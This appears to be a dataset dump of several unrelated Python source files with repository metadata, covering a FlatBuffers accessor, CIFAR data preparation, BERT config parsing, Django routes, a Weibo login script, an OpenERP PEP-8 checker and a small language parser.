n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = ArrayULong()
x.Init(buf, n + offset)
return x
# ArrayULong
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# ArrayULong
def Value(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
a = self._tab.Vector(o)
return self._tab.Get(flatbuffers.number_types.Uint64Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 8))
return 0
# ArrayULong
def ValueAsNumpy(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint64Flags, o)
return 0
# ArrayULong
def ValueLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.VectorLen(o)
return 0
def ArrayULongStart(builder): builder.StartObject(1)
def ArrayULongAddValue(builder, value): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(value), 0)
def ArrayULongStartValueVector(builder, numElems): return builder.StartVector(8, numElems, 8)
def ArrayULongEnd(builder): return builder.EndObject()
| [
"mark.koennecke@psi.ch"
] | mark.koennecke@psi.ch |
719502011e9a893593a19a8760e6d0f6b400f272 | d48bb46fe6e46ca24e8c514d274f4b3f2cc602b2 | /tools/conv_cifar_2.py | bf2caba93ce583610ff6f8a68b2333b8351e9e53 | [
"MIT"
] | permissive | satishjasthi/cwcf | 76dca0740a64666a8c46b83c3cb9b1563012cf18 | 6617691f69a162b197f122c957da6aaf0e4b7424 | refs/heads/master | 2020-04-21T06:16:00.865439 | 2019-02-06T11:03:37 | 2019-02-06T11:03:37 | 164,435,454 | 0 | 0 | MIT | 2019-01-07T13:18:12 | 2019-01-07T13:18:12 | null | UTF-8 | Python | false | false | 1,713 | py | from torchvision import datasets, transforms
import pandas as pd
import numpy as np
COLUMN_LABEL = '_label'
SEED = 998822
#---
np.random.seed(SEED)
#---
def get_data(train):
data_raw = datasets.CIFAR10('../data/dl/', train=train, download=True, transform=transforms.Compose([
transforms.Grayscale(),
transforms.Resize((20, 20)),
transforms.ToTensor(),
lambda x: x.numpy().flatten()]))
data_x, data_y = zip(*data_raw)
data_x = np.array(data_x)
data_y = np.array(data_y, dtype='int32').reshape(-1, 1)
# binarize
label_0 = data_y < 5
label_1 = ~label_0
data_y[label_0] = 0
data_y[label_1] = 1
data = pd.DataFrame(data_x)
data[COLUMN_LABEL] = data_y
return data, data_x.mean(), data_x.std()
#---
data_train, avg, std = get_data(train=True)
data_test, _, _ = get_data(train=False)
# shuffle
val_idx = np.random.choice(data_train.shape[0], 10000, replace=False).tolist()
data_val = data_train.iloc[val_idx]
data_train = data_train.drop(val_idx)
print(data_train.head())
print("Number of features:", data_train.shape[1] - 1)
print("Classes:", data_train.iloc[:, -1].unique())
print()
print("Train len:", data_train.shape[0])
print("Val len: ", data_val.shape[0])
print("Test len: ", data_test.shape[0])
data_train.to_pickle("../data/cifar-2-train")
data_val.to_pickle("../data/cifar-2-val")
data_test.to_pickle("../data/cifar-2-test")
#--- prepare meta
idx = data_train.columns[:-1]
meta = pd.DataFrame(index=idx, dtype='float32')
meta['avg'] = avg #data_train.mean()
meta['std'] = std #data_train.std()
meta['cost'] = 1.
meta.loc[ meta['std'] == 0., 'std' ] = 1.0
meta = meta.astype('float32')
print()
print(meta)
meta.to_pickle("../data/cifar-2-meta")
| [
"jaara.j@gmail.com"
] | jaara.j@gmail.com |
d605004a43e9c6bfffeb41b5a4af64b8f0c32c86 | f2d7e8d536d77e786dc519fc54e13cb496663f51 | /t2t_bert/distributed_single_sentence_classification/model_interface.py | d76ef1883cd7001f4cf830209683115dcb9f99b0 | [
"Apache-2.0"
] | permissive | CBHell/BERT | a8ecfb36e3ddf1741f1e523dbab8b5ea350c0850 | 049ba2dc1cffe8eb3dbecf13ba3aaf17f4c3293f | refs/heads/master | 2020-09-08T09:37:22.421778 | 2019-11-11T11:54:01 | 2019-11-11T11:54:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,616 | py | from distributed_encoder.bert_encoder import bert_encoder
from distributed_encoder.bert_encoder import bert_rule_encoder
from distributed_encoder.gpt_encoder import gpt_encoder
from distributed_encoder.bert_encoder import albert_encoder
from distributed_encoder.classifynet_encoder import textcnn_encoder
from distributed_encoder.classifynet_encoder import textlstm_encoder
from distributed_encoder.interaction_encoder import match_pyramid_encoder
from distributed_encoder.classifynet_encoder import dan_encoder
import tensorflow as tf
import numpy as np
import json
from bunch import Bunch
import os, sys
def model_zoo(model_config):
if model_config.get("model_type", "bert") == "bert":
print("==apply bert encoder==")
model_interface = bert_encoder
elif model_config.get("model_type", "bert") == "bert_rule":
print("==apply bert rule encoder==")
model_interface = bert_rule_encoder
elif model_config.get("model_type", "bert") in ["textcnn", "textcnn_distillation",
"textcnn_distillation_adv_adaptation"]:
print("==apply textcnn encoder==")
model_interface = textcnn_encoder
elif model_config.get("model_type", "bert_small") == "bert_small":
print("==apply bert small encoder==")
model_interface = bert_encoder
elif model_config.get("model_type", "bert") in ["textlstm", "textlstm_distillation"]:
model_interface = textlstm_encoder
elif model_config.get("model_type", "match_pyramid") in ["match_pyramid", "match_pyramid_distillation"]:
model_interface = match_pyramid_encoder
elif model_config.get("model_type", "match_pyramid") in ["dan", "dan_distillation"]:
model_interface = dan_encoder
elif model_config.get('model_type', 'gpt') in ['gpt']:
model_interface = gpt_encoder
elif model_config.get("model_type", "albert") == "albert":
model_interface = albert_encoder
return model_interface
def model_config_parser(FLAGS):
print(FLAGS.model_type)
if FLAGS.model_type in ["bert", "bert_rule", "albert"]:
config = json.load(open(FLAGS.config_file, "r"))
print(config, '==model config==')
config = Bunch(config)
config.use_one_hot_embeddings = True
config.scope = "bert"
config.dropout_prob = 0.1
config.label_type = "single_label"
config.model_type = FLAGS.model_type
config.ln_type = FLAGS.ln_type
if FLAGS.task_type in ['bert_pretrain']:
if FLAGS.load_pretrained == "yes":
config.init_lr = 2e-5
else:
config.init_lr = 1e-4
config.warmup = 0.1
print('==apply bert pretrain==', config.init_lr)
else:
if FLAGS.model_type in ['albert']:
try:
config.init_lr = FLAGS.init_lr
except:
config.init_lr = 1e-4
else:
config.init_lr = 2e-5
config.loss = "entropy"
config.rule_type_size = 2
config.lm_ratio = 1.0
config.max_length = FLAGS.max_length
config.nsp_ratio = 0.0
config.max_predictions_per_seq = FLAGS.max_predictions_per_seq
if FLAGS.task_type in ["pair_sentence_classification"]:
config.classifier = FLAGS.classifier
elif FLAGS.model_type in ["bert_small"]:
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.use_one_hot_embeddings = True
config.scope = "bert"
config.dropout_prob = 0.1
config.label_type = "single_label"
config.model_type = FLAGS.model_type
config.init_lr = 3e-5
config.num_hidden_layers = FLAGS.num_hidden_layers
config.loss = "entropy"
config.rule_type_size = 2
if FLAGS.task_type in ["pair_sentence_classification"]:
config.classifier = FLAGS.classifier
config.output_layer = FLAGS.output_layer
elif FLAGS.model_type in ["textcnn", 'textcnn_distillation',
'textcnn_distillation_adv_adaptation']:
from data_generator import load_w2v
w2v_path = os.path.join(FLAGS.buckets, FLAGS.w2v_path)
vocab_path = os.path.join(FLAGS.buckets, FLAGS.vocab_file)
print(w2v_path, vocab_path)
[w2v_embed, token2id,
id2token, is_extral_symbol] = load_w2v.load_pretrained_w2v(vocab_path, w2v_path)
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.token_emb_mat = w2v_embed
config.char_emb_mat = None
config.vocab_size = w2v_embed.shape[0]
config.max_length = FLAGS.max_length
config.emb_size = w2v_embed.shape[1]
config.scope = "textcnn"
config.char_dim = w2v_embed.shape[1]
config.char_vocab_size = w2v_embed.shape[0]
config.char_embedding = None
config.model_type = FLAGS.model_type
config.dropout_prob = config.dropout_rate
config.init_lr = config.learning_rate
if is_extral_symbol == 1:
config.extra_symbol = ["<pad>", "<unk>", "<s>", "</s>"]
print("==need extra_symbol==")
if FLAGS.task_type in ["pair_sentence_classification"]:
config.classifier = FLAGS.classifier
config.output_layer = FLAGS.output_layer
elif FLAGS.model_type in ["textlstm", "textlstm_distillation"]:
from data_generator import load_w2v
w2v_path = os.path.join(FLAGS.buckets, FLAGS.w2v_path)
vocab_path = os.path.join(FLAGS.buckets, FLAGS.vocab_file)
print(w2v_path, vocab_path)
[w2v_embed, token2id,
id2token, is_extral_symbol] = load_w2v.load_pretrained_w2v(vocab_path, w2v_path)
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.token_emb_mat = w2v_embed
config.char_emb_mat = None
config.vocab_size = w2v_embed.shape[0]
config.max_length = FLAGS.max_length
config.emb_size = w2v_embed.shape[1]
config.scope = "textlstm"
config.char_dim = w2v_embed.shape[1]
config.char_vocab_size = w2v_embed.shape[0]
config.char_embedding = None
config.model_type = FLAGS.model_type
config.dropout_prob = config.dropout_rate
config.init_lr = config.learning_rate
config.grad_clip = "gloabl_norm"
config.clip_norm = 5.0
if is_extral_symbol == 1:
config.extra_symbol = ["<pad>", "<unk>", "<s>", "</s>"]
print("==need extra_symbol==")
if FLAGS.task_type in ["pair_sentence_classification"]:
config.classifier = FLAGS.classifier
config.output_layer = FLAGS.output_layer
elif FLAGS.model_type in ["match_pyramid", "match_pyramid_distillation"]:
from data_generator import load_w2v
w2v_path = os.path.join(FLAGS.buckets, FLAGS.w2v_path)
vocab_path = os.path.join(FLAGS.buckets, FLAGS.vocab_file)
print(w2v_path, vocab_path)
[w2v_embed, token2id,
id2token, is_extral_symbol] = load_w2v.load_pretrained_w2v(vocab_path, w2v_path)
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.token_emb_mat = w2v_embed
config.char_emb_mat = None
config.vocab_size = w2v_embed.shape[0]
config.max_length = FLAGS.max_length
config.emb_size = w2v_embed.shape[1]
config.scope = "match_pyramid"
config.char_dim = w2v_embed.shape[1]
config.char_vocab_size = w2v_embed.shape[0]
config.char_embedding = None
config.model_type = FLAGS.model_type
config.dropout_prob = config.dropout_rate
config.init_lr = config.learning_rate
config.grad_clip = "gloabl_norm"
config.clip_norm = 5.0
if is_extral_symbol == 1:
config.extra_symbol = ["<pad>", "<unk>", "<s>", "</s>"]
print("==need extra_symbol==")
config.max_seq_len = FLAGS.max_length
if FLAGS.task_type in ["interaction_pair_sentence_classification"]:
config.classifier = FLAGS.classifier
config.output_layer = FLAGS.output_layer
if config.compress_emb:
config.embedding_dim_compressed = config.cnn_num_filters
elif FLAGS.model_type in ["dan", 'dan_distillation']:
from data_generator import load_w2v
w2v_path = os.path.join(FLAGS.buckets, FLAGS.w2v_path)
vocab_path = os.path.join(FLAGS.buckets, FLAGS.vocab_file)
print(w2v_path, vocab_path)
[w2v_embed, token2id,
id2token, is_extral_symbol] = load_w2v.load_pretrained_w2v(vocab_path, w2v_path)
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.token_emb_mat = w2v_embed
config.char_emb_mat = None
config.vocab_size = w2v_embed.shape[0]
config.max_length = FLAGS.max_length
config.emb_size = w2v_embed.shape[1]
config.scope = "dan"
config.char_dim = w2v_embed.shape[1]
config.char_vocab_size = w2v_embed.shape[0]
config.char_embedding = None
config.model_type = FLAGS.model_type
config.dropout_prob = config.dropout_rate
config.init_lr = config.learning_rate
if is_extral_symbol == 1:
config.extra_symbol = ["<pad>", "<unk>", "<s>", "</s>"]
print("==need extra_symbol==")
if FLAGS.task_type in ["pair_sentence_classification"]:
config.classifier = FLAGS.classifier
config.output_layer = FLAGS.output_layer
elif FLAGS.model_type in ['gpt']:
config = json.load(open(FLAGS.config_file, "r"))
config = Bunch(config)
config.dropout_prob = 0.1
config.init_lr = 1e-4
return config | [
"albert.xht@alibaba-inc.com"
] | albert.xht@alibaba-inc.com |
62440746b0d3fd1916415e079d0bfe1620d32437 | 5f9ee3c4ba97b20efbd07338f92af6e41d8aa654 | /test_urllib_weibologin.py | faaeac1c012d67266e63addaf3c3cc9e180808ec | [] | no_license | liyouzhi/python-practice | 70161cc2ebabe070376e62837fb1878d5acb106e | f7c8fe3d21e92b2d3e8d15d371a52962769976a3 | refs/heads/master | 2021-01-19T12:07:07.910380 | 2017-04-12T06:52:39 | 2017-04-12T06:52:39 | 88,018,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | from urllib import request, parse
print('Login to weibo.cn...')
email = input('Email: ')
passwd = input('Password: ')
login_data = parse.urlencode([
('username', email),
('password', passwd),
('entry', 'mweibo'),
('client_id', ''),
('savestate', '1'),
('ec', ''),
('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', f.read().decode('utf-8'))
| [
"lyz@buaa.us"
] | lyz@buaa.us |
a0dac36bbe1f2c1d009e9ea4b9aee9aab1968df1 | 9922b58a98753806ae836d0357b5451575f7e15b | /data/urls.py | f0f34aefbdc639aeabb2e2545f2d4c66b6387d65 | [] | no_license | ohhhhmy/hackathon | 41bbb9e9c7b73d366a11e73a7f0598344f48c159 | f42b3258bcc0fff6b559842f3ee3b786ae95d281 | refs/heads/master | 2022-12-21T01:40:06.953930 | 2019-07-30T05:32:30 | 2019-07-30T05:32:30 | 199,580,026 | 0 | 0 | null | 2022-12-08T05:56:56 | 2019-07-30T05:21:05 | HTML | UTF-8 | Python | false | false | 402 | py | from django.urls import path
from . import views
urlpatterns = [
path('show', views.show, name="show"),
path('search', views.search, name="search"),
path('<int:data_id>', views.detail, name="detail"),
path('show/sortName', views.sortName, name="sortName"),
path('show/sortPrice', views.sortPrice, name="sortPrice"),
path('pricefilter', views.pricefilter, name="pricefilter"),
] | [
"dmsdh316@naver.com"
] | dmsdh316@naver.com |
594cdad708a08bfdabee9afb17a6462235d503d6 | 8600ea155f279e5a8dfe5a1926038511f6b6a7ea | /base_module_quality/pep8_test/pep8_test.py | 395520a63f88c32bd97b8c0358546252a2444e06 | [] | no_license | MarkNorgate/addons-EAD | c2fff89ab16fce3ba19fbe433ee5863705a6f4e5 | 840f28642b5d328e4b86839c413e5164622295a5 | refs/heads/master | 2020-04-23T22:11:00.164438 | 2015-07-22T12:24:53 | 2015-07-22T12:24:53 | 39,501,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,797 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import os
from tools.translate import _
from base_module_quality import base_module_quality
class quality_test(base_module_quality.abstract_quality_check):
def __init__(self):
super(quality_test, self).__init__()
self.name = _("PEP-8 Test")
self.note = _("""
PEP-8 Test , copyright of py files check, method can not call from loops
""")
self.bool_installed_only = False
self.bad_standard = 0
self.good_standard = 0
self.result_py = {}
self.min_score = 40
def run_test(self, cr, uid, module_path):
list_files = os.listdir(module_path)
for i in list_files:
path = os.path.join(module_path, i)
if os.path.isdir(path):
for j in os.listdir(path):
list_files.append(os.path.join(i, j))
py_list = []
for file_py in list_files:
if file_py.split('.')[-1] == 'py' and not file_py.endswith('__init__.py') and not file_py.endswith('__terp__.py'):
file_path = os.path.join(module_path, file_py)
py_list.append(file_path)
open_files = map(lambda x: open(x, 'r'), py_list)
if not py_list:
self.error = True
self.result = _("No python file found")
return None
#below functions check:
#1. Imports should usually be on separate lines
#2. Imports are always put at the top of the file, just after any module comments and docstrings, and before module globals and constants
self.check_import(open_files)
#1. there should be a one space after , : ;
self.check_space(open_files)
#1. Have all the .py files a copyright?
self.check_licence(open_files)
#1. Does the module avoid unecessary queries like when we put a browse into a loop?
self.check_loop(open_files)
#1.More than one space around an assignment (or other) operator to align it with another.
# self.check_space_operator(open_files)
#1. For sequences, (strings, lists, tuples), use the fact that empty sequences are false
#for e.g : if seq: => good & if len(seq): => not good
self.check_len(open_files)
# below function checks
# 1. Don't compare boolean values to True or False using == and !=
self.check_boolean(open_files)
self.score = self.good_standard and float(self.good_standard) / float(self.good_standard + self.bad_standard)
if self.score*100 < self.min_score:
self.message = 'Score is below than minimal score(%s%%)' % self.min_score
self.result = self.get_result({ module_path: [int(self.score * 100)]})
self.result_details += self.get_result_general(self.result_py)
return None
def check_import(self, open_files):
for py in open_files:
py.seek(0)
class_or_def = False
line_counter = 0
file_name = py.name.split('/')[-1]
while True:
line_counter += 1
line = py.readline()
if not line: break
if ((line.find('class') > -1) or (line.find('def') > -1)):
class_or_def = True
import_found = line.find('import')
comment_found = line.find('#')
if comment_found == -1 and import_found != -1:
self.good_standard += 1
if (class_or_def):
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, 'Imports are always put at the top of the file, just after any module comments and docstrings, and before module globals and constants']
if (line.find('from') < 0 and line.find(',') != -1):
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, 'Imports should usually be on separate lines']
def check_licence(self, open_files):
for py in open_files:
py.seek(0)
bad_position = False
copyright_found = False
gnu_found = False
license_found = False
gnu_website_found = False
line_counter = 0
file_name = py.name.split('/')[-1]
while True:
declaration = False
flag = False
line_counter += 1
line = py.readline()
if not line: break
if ((line.find('class') > -1) or (line.find('def') > -1) or (line.find('import') > -1)):
bad_position = True
comment_found = line.find('#')
copyright_found = line.find('Copyright')
gnu_found = line.find('GNU')
license_found = line.find('License')
gnu_website_found = line.find('www.gnu.org/licenses')
if ((copyright_found > -1) or (gnu_found > -1) or (license_found > -1) or (gnu_website_found > -1)):
self.good_standard += 1
declaration = True
flag = True
break
if (comment_found > -1) and bad_position and declaration:
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, 'Declaration of copyright must be at the top of file']
break
if bad_position and (not flag):
self.bad_standard += 1
self.result_py[file_name] = [file_name, '--', 'File is not copyright']
def check_loop(self, open_files):
for py in open_files:
py.seek(0)
methods = ['browse', 'search', 'read', 'copy', 'unlink']
place_for = 1000
file_name = py.name.split('/')[-1]
line_counter = 0
counter = 0
while True:
line_counter += 1
line = py.readline()
if not line: break
place_method = 0
for i in line :
if (i == ' '):
place_method += 1
elif (i != ' '):
break
elif (place_method > 100):
break
if (line.find('for') > -1):
place_for = place_method
if (place_for < place_method):
counter += 1
for method in methods:
got = line.find(method)
if(got > -1):
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, 'puting method inside loop is not good']
self.good_standard += counter
def check_space(self, open_files):
for py in open_files:
py.seek(0)
counter_line = 0
file_name = py.name.split('/')[-1]
counter = 0
while True:
counter_line += 1
line = py.readline()
if not line: break
pos_comma = line.find(',')
pos_semicolon = line.find(';')
pos_colon = line.find(':')
space_find = -1
if (pos_comma != -1 or pos_semicolon != -1 or pos_colon != -1):
counter += 1
for i in line:
space_find += 1
if (i == ' '):
if ((space_find + 1) == pos_comma) or ((space_find + 1) == pos_semicolon) or ((space_find + 1) == pos_colon):
self.bad_standard += 1
self.result_py[file_name + str(counter_line)] = [file_name, counter_line, 'You should not have space before (: ; ,)']
self.good_standard += counter # to be check
def check_space_operator(self, open_files):
for py in open_files:
py.seek(0)
space_counter = 0
eq_found = False
operator_found = False
line_counter = 0
file_name = py.name.split('/')[-1]
while True:
line_counter += 1
line = py.readline()
if not line: break
for counter in line:
if (counter == ' '):
space_counter += 1
else:
if (space_counter > 1):
if counter in ['=', '<', '>', '!', '+', '-', '*', '/', '^', '%'] or operator_found:
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, 'More than one space around an assignment (or other) operator to align it with another']
operator_found = False
space_counter = 0
if counter in ['=', '<', '>', '!', '+', '-', '*', '/', '^', '%']:
self.good_standard += 1
operator_found = True
def check_len(self, open_files):
for py in open_files:
py.seek(0)
line_counter = 0
file_name = py.name.split('/')[-1]
while True:
line_counter += 1
line = py.readline()
if not line: break
if (line.find('if') > -1) and (line.find('len(') > -1) and (line.find(')') > -1):
self.good_standard += 1
if (line.find(':') > -1) and not line.find('<') > -1 and not line.find('>') > -1 and not line.find('=') > -1 and not line.find('!') > -1 :
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, ' For sequences, (strings, lists, tuples), use the fact that empty sequences are false']
def check_boolean(self, open_files):
for py in open_files:
py.seek(0)
line_counter = 0
file_name = py.name.split('/')[-1]
while True:
line_counter += 1
line = py.readline()
if not line: break
if (line.find('if') > -1):
self.good_standard += 1
if ((line.find('==') > -1) or (line.find('!=') > -1)) and ((line.find('True') > -1) or (line.find('False') > -1)):
self.bad_standard += 1
self.result_py[file_name + str(line_counter)] = [file_name, line_counter, "Don't compare boolean values to True or False using == or !="]
def get_result(self, dict_obj):
header = ('{| border="1" cellspacing="0" cellpadding="5" align="left" \n! %-40s \n', [_('Result of pep8_test in %')])
if not self.error:
return self.format_table(header, data_list=dict_obj)
return ""
def get_result_general(self, dict_obj):
str_html = '''<html><strong>Result</strong><head>%s</head><body><table class="tablestyle">'''%(self.get_style())
header = ('<tr><th class="tdatastyle">%s</th><th class="tdatastyle">%s</th><th class="tdatastyle">%s</th></tr>', [_('Object Name'), _('Line number'), _('Suggestion')])
if not self.error:
res = str_html + self.format_html_table(header, data_list=dict_obj) + '</table></body></html>'
res = res.replace('''<td''', '''<td class="tdatastyle" ''')
return res
return ""
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"mark.norgate@affinity-digital.com"
] | mark.norgate@affinity-digital.com |
88de90beb87dc98e7b6cecbef0885d4eb331071d | b01eee55884e21412a1812593996a0d9156e20bc | /cipp/parser.py | a61415f56a03d5a2ccf442dd729ad537e1406db5 | [] | no_license | JacquesLucke/cipp | 46bdb7eebaeb863f424c92542ea56b49b5f0fe2e | d4f38fd1fc84aed9cbf49b85bf6c4b96f2561f71 | refs/heads/master | 2021-10-27T18:29:23.288884 | 2019-04-18T15:36:52 | 2019-04-18T15:36:52 | 123,611,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,498 | py | from . import ast
from . lexer import Lexer
from . token_stream import TokenStream
from . tokens import (
createSingleCharToken,
IdentifierToken, IntegerToken,
CommentToken, WhitespaceToken
)
SingleCharToken = createSingleCharToken("(){}[],=+-*/@;<>!")
cippLexer = Lexer(
[IdentifierToken, IntegerToken, CommentToken,
SingleCharToken, WhitespaceToken],
ignoredTokens = [WhitespaceToken, CommentToken]
)
def parse(string):
tokens = stringToTokenStream(string)
return parseProgram(tokens)
def stringToTokenStream(string):
return TokenStream(cippLexer.tokenize(string))
def parseProgram(tokens):
functions = []
while nextIsKeyword(tokens, "def"):
function = parseFunction(tokens)
functions.append(function)
return ast.Program(functions)
def parseFunction(tokens):
acceptKeyword(tokens, "def")
retType = parseType(tokens)
acceptLetter(tokens, "@")
name = acceptIdentifier(tokens)
arguments = parseArguments(tokens)
statement = parseStatement(tokens)
return ast.Function(name, retType, arguments, statement)
def parseArguments(tokens):
return parseList(tokens, parseArgument, "(", ")", ",")
def parseArgument(tokens):
dataType = parseType(tokens)
name = acceptIdentifier(tokens)
return ast.Argument(name, dataType)
def parseType(tokens):
dataType = acceptIdentifier(tokens)
return ast.Type(dataType)
def parseStatement(tokens):
if nextIsLetter(tokens, "{"):
return parseStatement_Block(tokens)
elif nextIsKeyword(tokens, "return"):
return parseStatement_Return(tokens)
elif nextIsKeyword(tokens, "let"):
return parseStatement_Let(tokens)
elif nextIsKeyword(tokens, "while"):
return parseStatement_While(tokens)
elif nextIsKeyword(tokens, "if"):
return parseStatement_If(tokens)
elif nextIsIdentifier(tokens):
return parseStatement_Assignment(tokens)
else:
raise Exception("unknown statement type")
def parseStatement_Block(tokens, a = 0):
statements = parseList(tokens, parseStatement, "{", "}")
if len(statements) == 1:
return statements[0]
else:
return ast.BlockStmt(statements)
def parseStatement_Return(tokens):
acceptKeyword(tokens, "return")
expression = parseExpression(tokens)
acceptLetter(tokens, ";")
return ast.ReturnStmt(expression)
def parseStatement_Let(tokens):
acceptKeyword(tokens, "let")
dataType = parseType(tokens)
name = acceptIdentifier(tokens)
acceptLetter(tokens, "=")
expression = parseExpression(tokens)
acceptLetter(tokens, ";")
return ast.LetStmt(name, dataType, expression)
def parseStatement_Assignment(tokens):
targetName = acceptIdentifier(tokens)
if nextIsLetter(tokens, "["):
acceptLetter(tokens, "[")
offset = parseExpression(tokens)
acceptLetter(tokens, "]")
acceptLetter(tokens, "=")
expression = parseExpression(tokens)
acceptLetter(tokens, ";")
return ast.ArrayAssignmentStmt(targetName, offset, expression)
else:
acceptLetter(tokens, "=")
expression = parseExpression(tokens)
acceptLetter(tokens, ";")
return ast.AssignmentStmt(targetName, expression)
def parseStatement_While(tokens):
acceptKeyword(tokens, "while")
acceptLetter(tokens, "(")
condition = parseExpression(tokens)
acceptLetter(tokens, ")")
statement = parseStatement(tokens)
return ast.WhileStmt(condition, statement)
def parseStatement_If(tokens):
acceptKeyword(tokens, "if")
acceptLetter(tokens, "(")
condition = parseExpression(tokens)
acceptLetter(tokens, ")")
thenStatement = parseStatement(tokens)
if nextIsKeyword(tokens, "else"):
acceptKeyword(tokens, "else")
elseStatement = parseStatement(tokens)
return ast.IfElseStmt(condition, thenStatement, elseStatement)
else:
return ast.IfStmt(condition, thenStatement)
def parseExpression(tokens):
'''
Expression parsing happens at different levels
because of operator precedence rules.
'''
return parseExpression_ComparisonLevel(tokens)
def parseExpression_ComparisonLevel(tokens):
expressionLeft = parseExpression_AddSubLevel(tokens)
if nextIsComparisonOperator(tokens):
operator = parseComparisonOperator(tokens)
expressionRight = parseExpression_AddSubLevel(tokens)
return ast.ComparisonExpr(operator, expressionLeft, expressionRight)
else:
return expressionLeft
comparisonOperators = ("==", "<=", ">=", "!=", "<", ">")
def parseComparisonOperator(tokens):
for operator in comparisonOperators:
if nextLettersAre(tokens, operator):
acceptLetters(tokens, operator)
return operator
raise Exception("unknown comparison operator")
def parseExpression_AddSubLevel(tokens):
terms = []
term = parseExpression_MulDivLevel(tokens)
terms.append(ast.AddedTerm(term))
while nextIsOneOfLetters(tokens, "+", "-"):
if nextIsLetter(tokens, "+"):
acceptLetter(tokens, "+")
term = parseExpression_MulDivLevel(tokens)
terms.append(ast.AddedTerm(term))
elif nextIsLetter(tokens, "-"):
acceptLetter(tokens, "-")
term = parseExpression_MulDivLevel(tokens)
terms.append(ast.SubtractedTerm(term))
if len(terms) == 1 and isinstance(terms[0], ast.AddedTerm):
return terms[0].expr
else:
return ast.AddSubExpr(terms)
def parseExpression_MulDivLevel(tokens):
terms = []
factor = parseExpression_FactorLevel(tokens)
terms.append(ast.MultipliedTerm(factor))
while nextIsOneOfLetters(tokens, "*", "/"):
if nextIsLetter(tokens, "*"):
acceptLetter(tokens, "*")
factor = parseExpression_FactorLevel(tokens)
terms.append(ast.MultipliedTerm(factor))
elif nextIsLetter(tokens, "/"):
acceptLetter(tokens, "/")
factor = parseExpression_FactorLevel(tokens)
terms.append(ast.DividedTerm(factor))
if len(terms) == 1 and isinstance(terms[0], ast.MultipliedTerm):
return terms[0].expr
else:
return ast.MulDivExpr(terms)
def parseExpression_FactorLevel(tokens):
if nextIsIdentifier(tokens):
name = acceptIdentifier(tokens)
return ast.Variable(name)
elif nextIsInteger(tokens):
value = acceptInteger(tokens)
return ast.ConstInt(value)
elif nextIsLetter(tokens, "("):
acceptLetter(tokens, "(")
expression = parseExpression(tokens)
acceptLetter(tokens, ")")
return expression
elif nextIsLetter(tokens, "@"):
return parseFunctionCall(tokens)
def parseFunctionCall(tokens):
acceptLetter(tokens, "@")
name = acceptIdentifier(tokens)
arguments = parseCallArguments(tokens)
return ast.FunctionCall(name, arguments)
def parseCallArguments(tokens):
return parseList(tokens, parseExpression, "(", ")", ",")
def parseList(tokens, parseElement, start, end, separator = None):
elements = []
acceptLetter(tokens, start)
while not nextIsLetter(tokens, end):
element = parseElement(tokens)
elements.append(element)
if separator is not None:
if nextIsLetter(tokens, separator):
acceptLetter(tokens, separator)
else:
break
acceptLetter(tokens, end)
return elements
# Utility Functions
####################################################
def acceptKeyword(tokens, keyword):
if nextIsKeyword(tokens, keyword):
tokens.takeNext()
else:
raise Exception(f"expected keyword '{keyword}'")
def acceptLetters(tokens, letters):
for letter in letters:
acceptLetter(tokens, letter)
def acceptLetter(tokens, letter):
if nextIsLetter(tokens, letter):
tokens.takeNext()
else:
raise Exception(f"expected token '{letter}'")
def acceptIdentifier(tokens):
if nextIsIdentifier(tokens):
return tokens.takeNext().value
else:
raise Exception("expected identifier")
def acceptInteger(tokens):
if nextIsInteger(tokens):
return tokens.takeNext().value
else:
raise Exception("expected integer")
